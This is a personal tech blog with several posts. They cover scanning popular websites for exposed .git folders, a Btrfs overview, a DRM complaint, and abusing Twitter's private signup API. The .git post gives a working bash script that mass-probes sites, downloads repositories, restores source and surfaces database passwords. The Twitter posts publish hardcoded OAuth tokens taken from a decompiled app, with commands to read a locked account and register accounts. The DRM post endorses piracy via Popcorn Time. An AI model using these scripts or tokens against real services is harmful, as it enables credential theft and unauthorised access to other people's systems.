ixchi

thoughts of a guy who loves computers a little too much

Finding .git folders

The Git version control system stores all its data about current and past revisions of files in a hidden folder, called .git. By convention, one does not include information such as passwords in Git and instead should use environmental variables or other configuration methods. However, due to poor programming practices and the general laziness of developers in major software platforms, it is common for developers to include sensitive information.

Most sane web servers will block access to hidden directories or files. Apache typically blocks .htaccess files from being seen. However, it seems that many do not deny access to .git folders.

When a server allows listing all files in a directory, you can use a tool to download all files contained within that folder.

Mirroring A Website

Common Linux utilities such as wget allow for mirroring a website with a single command. By downloading a list of popular websites, you can quickly check and mirror a great number incredibly quickly.

A simple bash script can take a list of websites and then download all contents of the folder. Here is a simple script that would take a given list, check if a .git folder exists, and then proceed to download that directory if possible.


#!/bin/bash

IFS=' ' read -r -a array <<< "$1"

echo "[${array[0]}] Checking ${array[1]}"
STATUSCODE=$(curl -L --silent --output /dev/null --write-out "%{http_code}" --max-time 5 http://${array[1]}/.git/HEAD)
if test $STATUSCODE = 200; then
        echo "${array[0]} Got 200 on ${array[1]}"
        wget -r --no-parent --connect-timeout=5 http://${array[1]}/.git/
fi

I ran this script on the Alexa top million sites. This yielded a surprising number of sites with .git directories.

Cleaning Results

Many websites return a 200 status code even though they say the page was not found. Additionally, a .git folder does not immediately show the source code.

It is fairly easy to clean up the results with a few simple commands. Again, a simple bash script can automate this.

#!/bin/bash

find . -name '*index.html*' -type f -delete

for D in "./"*
do
        if test -f $D/.git/HEAD
        then
                echo $D
                (
                        cd $D
                        git reset --hard HEAD
                        if [ $? -eq 0 ]; then
                                cd ..
                                mv $D ../valid/
                        fi
                )
        fi
done

This script file removes any HTML files that would interfere with Git, checks if the .git folder contains a HEAD, restores the source code from the history, and finally moves the code into a new folder where I can do further analysis.

Analyzing Results

I only ran my script through about 30,000 sites, which found 6 WordPress installs, including wp-config.php files. These configuration files contain usernames and passwords for the database and keys and salts. Sites that did not run WordPress are also included, and most still have database connection information.

While I could connect to these servers and export or dump the databases, I would not be able to do so in good conscience (and, of course, I do not wish to commit a crime).

Conclusion

A surprising number of websites have publicly accessible and indexable .git folders. With this, one could download a copy of the source code, and more often than not retrieve confidential information such as database passwords or salts.

Systems administrators absolutely must deny access to hidden files and folders to prevent similar attacks from being performed on websites.

Note: I do not suggest that running these scripts is a good idea. I did all of this for purely educational reasons. After briefly looking at some of this code obtained, I purged any remaining files from my servers and did not disclose any information about the sites.

Btrfs

Retrieving data from a storage device is fairly simple, assuming an you know which track and sector the data is stored in.

However, it is simply impossible for a person to remember all of these positions. A modern hard drive can store 8x10¹² individual bits of data!

An Intro To Filesystems

To solve the issue of remembering where files are on a disk, we have filesystems. One of the original filesystem is named FAT, or File Allocation Table. Although it was designed originally for floppy disks, it was used from DOS to Windows ME, and still lives on today.

A filesystem is just a fancy term for a big catalog of where files are. It stores the location of the beginning and end of files on the drive. Now we can look up this data, we can easily open any file.

FAT is just one of many filesystems that exist. As a result of the lacking ability of computers at FAT's conception, it had to efficiently do the minimum to work correctly, and it did this well.

Modern computers have significantly quicker disk write speeds, vastly larger quantities of RAM, and incredibly fast CPUs. With these, we introduced journaling filesystems.

Journaling Filesystems

If you were to unplug a computer using a FAT filesystem while it was writing or moving files, it would be left in an inconsistent state: the files might have moved and the catalog may or may not have been updated. These situations often lead to dataloss, as the system does not have an effective method of handling it.

NTFS, the filesystem in use by Windows today, is a journaled filesystem. The ext4 filesystem used by a great number of Linux installations is a journaled filesystem. Mac OS X uses HFSJ, again a journaled filesystem.

By journaling, or saving a log, of all of the changes being made, a system can replay events to determine the current drive state and what still needs to be done. If data was left in an unknown state, it can scan just a small area and determine what still needs to be done.

However, journaling filesystems are not perfect at preventing data loss. They are much better than filesystems that are not journaled and they do recover from sudden failures faster.

Journaling does absolutely nothing in the case of sudden storage failure. In the event that a hard drive or flash drive completely stops working, there is little that can be done to recover the data.

RAID

As data storage becomes less expensive, we can introduce tools such as RAID, a redundant array of independent disks. By storing at least two copies of all your data and filesystem information over two or more drives, a sudden drive failure will be less of a disaster. Even though one drive is no longer operational, the second drive contains all of your data. While this does not replace backups, it makes recovering a much faster operation.

There are different levels of RAID, or how the data is distributed across the varying number of drives. RAID0 is the least safe type of RAID, because there is no data redundancy. Its advantage is the ability to store single files larger than any single drive you have. RAID1 has a single parity drive, or a drive where an entire backup is stored. RAID6 allows for two drives to fail in a group of four without any data loss. There are a few other types, but they are not commonly used or combinations of the above.

RAID undoubtedly does have its own issues. If data becomes corrupted on one drive, it may try and replace the good data with this bad data. Hardware RAID controllers may fail and leave data nearly impossible to recover. You may have to bring the RAID system offline in order to perform data recovery.

As computers continue to evolve, new technologies are invented that can utilize new features to solve previous problems.

Btrfs

Btrfs is a relatively new filesystem that was designed to fix many of these issues. Btrfs can be used in a fashion similar to RAID with multiple drives, or it may be used on a single drive. Unlike RAID, it not just stores the file, it also stores a checksum of what the file should be.

Data Integrity

A checksum is a function performed on a set of data that returns a mostly unique and repeatable representation of this file or information. Changing even a single bit of data will yield an entirely different result. They are used frequently throughout programs in order to verify that there has not been data corruption or that the data has not been tampered with.

Here's an example of what checksumming data looks like, you may enter some text to see a CRC32 checksum of it.

Enter text

With 4 billion possible combinations, the output is nearly always a different, unpredictable result, and the same input will always return the same output.

Now that this checksum is stored, a computer can determine when a file has changed from what it should have been. Assuming that your data is in at least RAID1, it can restore the file that matches the checksum, instead of having uncertainty of which file is correct.

Advantages over RAID

Btrfs also allows far more flexibility than RAID. When using a RAID1 configuration, you have to have identically sized disks so that the data may fill up the entire drive. I don't always have even numbers of same capacity drives, and having to sacrifice disk space for data safety is not economical or practical. With Btrfs, I can create something similar to a RAID1 array with at least two drives, but can have any number of differently sized drives.

My current Btrfs array has 5 different drives in it, two 2TB drives and three 1TB drives. It intelligently places all data and metadata on two drives. If any drive were to fail, I would simply buy a replacement drive and tell Btrfs to replace the previous drive with this new one.

Btrfs offers transparent compression, meaning that any data saved on a drive is compressed when saving and decompressed when reading. While this requires using more CPU, it can save significant amounts of disk space without any additional work.

There are still many other features, such as subvolumes, subvolume quotas, data deduplication, snapshots, and others. All of these make it an excellent filesystem choice.

My Experience

My initial setup went fairly well, and has been working perfectly since. I have subvolumes to separate working data from backups and enabled transparent compression to save some disk space. Unfortunately, data deduplication requires more RAM to successfully manage than I have available.

My one complaint so far is that determining free disk space is difficult. Unlike ext4, I can't just run df -h /dev/sda and get a percent full.

Running df reports that I have used 3.0TiB of data and have 2.8TiB free. Running Btrfs' own df-like tool reports that I have only used 1.47TiB of data. A rough estimate suggests that I have less than 1.4TiB free.

Conclusion

As Btrfs is a newer filesystem, some data recovery tools may not work well with it. It also isn't supported on all platforms yet. While the developers claim it is stable, it has not gone through the same time trials as other filesystems have.

Companies such as Facebook and Jolla among various others have adopted Btrfs for use in their production environments. Some NAS devices have Btrfs support, if you wish to enable it.

With my current experience, I would recommend using Btrfs if you have proper backups of all your data and wish to make sure your data is always available and always correct. While I don't expect to encounter any issues with data integrity, being prepared is always better than the alternative.

If you wish to look into it more or learn how to use, the Btrfs Wiki is an excellent source of updated and accurate information.

Piracy Is Your Fault: Why DRM Is Bad

I just tried to purchase a TV series online. It took just two clicks to give them my money, $21 for a season. Eager to watch this series, I clicked play. The video started to load, but then, an error occurred!

"There is a problem with your Flash player"

While I don't like Flash Player for many, many, many, many reasons, I usually don't have many issues with it. It told me to reset my license files, and gave me a link to do so, and so I did. I restarted my browser, just like it asked me to. And I got the same error message. There have been posts on various forums with the same issue. One user posted a reply from an official Google support representative.

Thanks for contacting Google. After further investigation, we have confirmed that this is out side of our scope as this is not currently supported, you may want to refer to Ubuntu and Adobe for further help.

While I don't use Ubuntu, the issue still stands. Google is relying on technologies they cannot support in all circumstances, yet charging people for it.

I had first tried playing this video in Safari, so I decided to try it in Firefox. Now the error message told me to install Chrome and the Chrome Movies & TV app. I've been attempting to move Google out of my life, I certainly don't need any more of their services installed on my machines. I migrated over to my Windows desktop, and tried Microsoft Edge, the fancy new Internet Explorer replacement. And then I tried Firefox. All had the same result, the video simply would not play.

At this point, I got a refund on my purchase. I didn't want to have to deal with troubleshooting something that should just work.

I then purchased the same series from a different company, and it instantly started to play after my purchase. However, I can only play it on computers or devices with iTunes installed. This excludes two out of the three devices I primarily use.

While it does work, the first thing I saw upon playing it was an advertisement. Why would anyone pay for something and then have to watch advertisements? It is part of the reason Netflix has been so much more popular over Hulu.

This whole process has made me extremely wary of ever purchasing media online again. The fact that I can spend money on something under the idea that I would own it when in reality I have no ability to verify that it could even run on my device is strange, and that the media I might be able to play while connected to the Internet is laced with advertisements.

Alternative to the route of legally purchasing media is piracy, most commonly done through torrenting. Using something like Popcorn Time I can stream any movie or TV show to any media player on any device with just a few clicks. There is no DRM, there are no restrictions, and there aren't any advertisements. When the alternative that costs money has far more downsides, it is quite understandable why people do the less legal thing.

Not only do I now not have to worry about compatibility, but I will have this media for life (no DRM), and it will work on any device (I can simply convert it to any format I wish). I can store this media however and wherever I wish, without relying on "cloud" services to provide it to me at some later date.

While I'm still watching this TV series, I tried to look up where I can legally obtain DRM free media. As it turns out, it is impossible to do so! Even physical media such as Blu-rays have DRM. With such DRM, people who even physically own disks can be locked out of their own media. Many small publishers release their media DRM free, but for any major TV series or movie, it is impossible to get.

This is part of the reason that even with such harsh punishments people are willing to get such media via piracy; the media they purchase is not theirs and it often does not work but they still want it. This is why Netflix is so successful, it just works and is relatively inexpensive. If there were more effective and more consumer oriented methods of purchasing media, I am certain that people would be happier to purchase it. Until such a thing happens, piracy is still going to be an issue.

Availability of Short Twitter Handles

Somewhat recently, I wrote a post about signing up for Twitter accounts using their private API. I also talked about how there were endpoints for checking username availability. These endpoints have no rate limiting, which enables us to do many fun things. One such thing is checking over 2,000,000 handles to see if they were still available.

On Twitter, short handles are a coveted thing. There are not many of them, and most have been taken. There are only 50,653 three character handles available, and all of them claimed. Twitter allows for 37 possible characters in a handle, letters (26), numbers (10), and underscores (1), bring the allowed character count to 37.

To check how many possible handles there are in a certain character length, enter your number here.

There are 1,874,161 four character handles, quite a jump up from three characters. Again, however, all of these have been registered. Scanning through all of these took quite a while longer, but it was still doable.

Unfortunately, there are 69,343,957 million possible five character handles, which would take days to scan through, and I am certain Twitter would not like. To see what was available, I first started with a dictionary. There were no real words available. I then used a leaked password list to get potential handles that would not be entirely random, but not real words. In total, this was 249,992 items to try, a somewhat reasonable number. Of this, only 14,482 were available.

If you need a short Twitter handle, just click the button below, and it will pull a handle off the list I collected.

As time goes on, I am sure that these handles will dry up and Twitter will finally be forced to purge inactive accounts.

Registering accounts using the Twitter API

Twitter uses an API for everything. Many people have seen the limitations of it, such as third party clients not being able to get favorites on Tweets or only 100,000 clients allowed per token. This API has many hidden methods and functions that most developers will never see, even though they are very easy to find. Official 1st party tokens have access to many methods you can find using an endpoint designed to show ratelimiting information. Today, I'm going to be talking about a very specific type of API request—registering new accounts.

All of the following information and tokens have been pulled from Twitter for Windows, which I decompiled with JetBrains dotPeek.

Update as of August 2015: With .NET Native code, it is no longer possible to decompile Windows apps with these tools and such ease.

Tokens

Twitter uses OAuth for authenticating everything. There are hardcoded OAuth tokens for checking username availability and completing the registration. These tokens can be found in Twitter.OAuth.OAuthConstants. They are encoded in bytes and offset by some number, which can very easily be undone with a simple program. The offset number does not seem to have a clear origin. My best guess for storing these tokens as offset byte arrays is so that people cannot just search the file for a matching string, but it does not seem to actually help much.

Here is where things start to get interesting. If you look at Twitter's scheme for OAuth tokens, you can find the user ID at the start. For example, the signup access token is 537705597-lH08BZJKhd1iEgm0o3DYd0vcp8e7eOskzUjVNbSd. This belongs to a user with the ID of 537705597. Twitter internally uses an account named @cupb1rdtre3 to register all Twitter for Windows accounts. It is a locked account, but thanks to our access tokens, we can see what's inside!

A Strange Account

My favorite tool for sending raw requests to the Twitter API is called twurl, it is a free Twitter-published Ruby gem intended for debugging API calls. After manually adding these tokens to its configuration file, I can start sending requests authorized as it.

To see the account's most recent Tweets, you can run something like twurl /1.1/statuses/user_timeline.json?user_id=537705597. Using a lovely tool called jq, I can filter and pretty print this in my terminal window. We can filter this information down to just the Tweet text and created at time using twurl /1.1/statuses/user_timeline.json?user_id=537705597 | jq '.[] | {text: .text, created_at: .created_at}'. Here's a few Tweets from the account. If you want to see the rest, just run the command yourself.

{
  "text": "hi I'm @batuhan_katirci and looking for internship in Turkey!",
  "created_at": "Tue May 05 05:50:40 +0000 2015"
}
{
  "text": "I will never understand this account - A dog",
  "created_at": "Thu Apr 02 23:50:01 +0000 2015"
}
{
  "text": "boop",
  "created_at": "Tue Mar 17 21:45:32 +0000 2015"
}
{
  "text": "Might want to fix your security...",
  "created_at": "Mon Mar 16 22:09:52 +0000 2015"
}

Checking Account Availability

Now that we have tokens that are authorized to run registration functions, we can check if usernames, email addresses, etc. are in use.

Again, I am using twurl to fetch things. After a quick look at Twitter.Services.SignupServices in Twitter-Win8.exe, we can easily identify the endpoint for checking availability. It is https://api.twitter.com/i/users/email_available.json for email addresses, and https://api.twitter.com/i/users/username_available.json for usernames. Each endpoint requires an email or username parameter, respectively.

Here is a sample request checking for my (already in use) email address.

$ twurl /i/users/email_available.json?email=example@ghc.li | jq '.'
{
  "valid": false,
  "msg": "Email has already been taken."
}

Using this endpoint, someone could create a tool that would allow people to see if a not found page on Twitter was because the account no longer existed, or if it was deactivated.

Creating Accounts

Now that we can check if usernames or email addresses have already been used, we can use an API endpoint to actually create a new account.

Again, looking at SignupServices, we can find the endpoint for creating a new account, https://api.twitter.com/1.1/account/create.json. Unlike the other methods mentioned above, we need to send a POST request. To do this in twurl, we can add a -X POST to the command. However, because we are going to have to send form data to create the account, it becomes implied and we do not need this.

By looking at the Signup function we can determine which parameters are needed. The required fields are as follows:

Parameter Description Example
screen_name Your Twitter handle, which must be unused. GregCordover
email Your email address, which must be unused. example@ghc.li
password The account password a_cool_password
name A display name for the account Greg Cordover

If you do not include a screen_name, you will be given an account name based on your name and random numbers.

There are other, optional parameters, and you can look through the code to see what they are and how they work.

An example of the request needed looks like this: twurl -d 'email=example2@ghc.li' -d 'screen_name=ademo12345' -d 'name=A Demo Account' -d 'password=myawesomepassword' /1.1/account/create.json (yes, this is real information, you can log into this account!).

Conclusion

You now have the information needed to create your own Twitter accounts using their API with their tokens. Use this power for good, not evil. We certainly do not need any other spam accounts!

If you have any questions about the material contained in this document, feel free to throw me an email or send me a Tweet!